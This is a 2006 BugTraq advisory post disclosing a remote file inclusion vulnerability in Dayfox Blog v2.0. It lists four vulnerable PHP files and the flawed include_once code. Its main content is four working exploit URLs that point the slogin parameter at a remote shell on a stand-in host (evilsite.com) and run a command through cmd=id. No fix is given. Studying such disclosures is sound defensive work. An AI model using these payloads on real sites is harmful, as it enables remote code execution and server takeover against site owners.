BugTraq
Dayfox Blog v2.0 Remote file include Oct 01 2006 11:15AM
dj_remix_20 hotmail com
# BiyoSecurity.Org

# script name : Dayfox Blog v2.0

# Risk : High

# Regards : Dj ReMix

# Thanks : Korsan , Liz0zim

# Vulnerable files :

adminlog.php

postblog.php

index.php

index2.php

# Vulnerable code :

include_once ($slogin_path . "/slogin_lib.inc.php");

include_once ($slogin_path . "/header.inc.php");

Exploit : http://site.com/[path to script]/edit/adminlog.php?slogin=http://evilsite.com/shell.txt?&cmd=id

http://site.com/[path to script]/edit/index.php?slogin=http://evilsite.com/shell.txt?&cmd=id

http://site.com/[path to script]/edit/index2.php?slogin=http://evilsite.com/shell.txt?&cmd=id

http://site.com/[path to script]/edit/postblog.php?slogin=http://evilsite.com/shell.txt?&cmd=id

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus